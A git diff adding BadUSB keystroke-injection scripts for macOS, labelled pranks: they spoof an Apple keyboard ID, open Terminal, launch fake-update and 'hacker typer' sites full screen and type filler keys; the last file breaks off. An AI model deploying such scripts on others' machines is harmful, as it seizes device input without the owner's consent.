mode 100644 index 00000000..e27b616a --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Fake Update.txt @@ -0,0 +1,22 @@ +REM Title: Fake Update +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + +REM Accesses The Terminal Opens URL and goes into Full Screen +ID 05ac:021e Apple:Keyboard +DELAY 300 +GUI SPACE +DELAY 500 +STRING terminal.app +DELAY 1000 +ENTER +DELAY 1500 +STRING open http://fakeupdate.net/apple/ +ENTER +DELAY 1000 +GUI-CTRL F +DELAY 250 + diff --git a/BadUSB/MacOS-narstybits/Pranks/Hacke3 Typer.txt b/BadUSB/MacOS-narstybits/Pranks/Hacke3 Typer.txt new file mode 100644 index 00000000..09ad3cb8 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Hacke3 Typer.txt @@ -0,0 +1,88 @@ +REM Title: Hacke3_Typer +REM Author: UberGuidoZ & Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING open -a Safari 'https://geektyper.com/cyberpunk/' +DELAY 1000 +ENTER +DELAY 1000 +GUI-CTRL F +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 1500 +RIGHTARROW +DELAY 1500 +LEFTARROW +DELAY 1500 +STRING 3 +DELAY 1500 +SHIFT +DELAY 1500 +STRING 1 +DELAY 1500 +STRING 6 +DELAY 1500 +STRING 4 +DELAY 1500 +STRING 2 +DELAY 1500 +STRING 5 +DELAY 1500 +STRING 7 +DELAY 1500 +STRING 9 +DELAY 1500 +STRING 8 +DELAY 5000 +BACKSPACE +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING 0 +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +UPARROW +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 5000 +ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop diff --git a/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Blue.txt b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Blue.txt new file mode 100644 index 00000000..0eb003eb --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Blue.txt @@ -0,0 +1,87 @@ +REM Title: Hacker Typer Blue +REM Author: UberGuidoZ & Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING open -a Safari 'https://geektyper.com/blue/' +DELAY 1000 +ENTER +DELAY 1000 +GUI-CTRL F +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 1500 +RIGHTARROW +DELAY 1500 +LEFTARROW +DELAY 1500 +STRING 3 +DELAY 1500 +SHIFT +DELAY 1500 +STRING 1 +DELAY 1500 +STRING 6 +DELAY 1500 +STRING 4 +DELAY 1500 +STRING 2 +DELAY 1500 +STRING 5 +DELAY 1500 +STRING 7 +DELAY 1500 +STRING 9 +DELAY 1500 +STRING 8 +DELAY 5000 +BACKSPACE +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING 0 +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +UPARROW +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 5000 +ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop diff --git a/BadUSB/MacOS-narstybits/Pranks/Hacker Typer F Society.txt b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer F Society.txt new file mode 100644 index 00000000..babfcaeb --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer F Society.txt @@ -0,0 +1,87 @@ +REM Title: Hacker Typer F Society +REM Author:UberGuidoZ & Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING open -a Safari 'https://geektyper.com/fsociety/' +DELAY 1000 +ENTER +DELAY 1000 +GUI-CTRL F +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 1500 +RIGHTARROW +DELAY 1500 +LEFTARROW +DELAY 1500 +STRING 3 +DELAY 1500 +SHIFT +DELAY 1500 +STRING 1 +DELAY 1500 +STRING 6 +DELAY 1500 +STRING 4 +DELAY 1500 +STRING 2 +DELAY 1500 +STRING 5 +DELAY 1500 +STRING 7 +DELAY 1500 +STRING 9 +DELAY 1500 +STRING 8 +DELAY 5000 +BACKSPACE +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING 0 +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +UPARROW +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 5000 +ALT F4qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopH1642579qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop0qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuioppqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop diff --git a/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Minecraft.txt b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Minecraft.txt new file mode 100644 index 00000000..ede7f84d --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Hacker Typer Minecraft.txt @@ -0,0 +1,86 @@ +REM Title: Hacker Typer Minecraft +REM Author:UberGuidoZ & Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING open -a Safari 'https://geektyper.com/minecraft/' +DELAY 1000 +ENTER +DELAY 1000 +GUI-CTRL F +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 1500 +RIGHTARROW +DELAY 1500 +LEFTARROW +DELAY 1500 +STRING 3 +DELAY 1500 +SHIFT +DELAY 1500 +STRING 1 +DELAY 1500 +STRING 6 +DELAY 1500 +STRING 4 +DELAY 1500 +STRING 2 +DELAY 1500 +STRING 5 +DELAY 1500 +STRING 7 +DELAY 1500 +STRING 9 +DELAY 1500 +STRING 8 +DELAY 5000 +BACKSPACE +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING 0 +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +UPARROW +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 500 +STRING qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop +DELAY 5000 +ALT 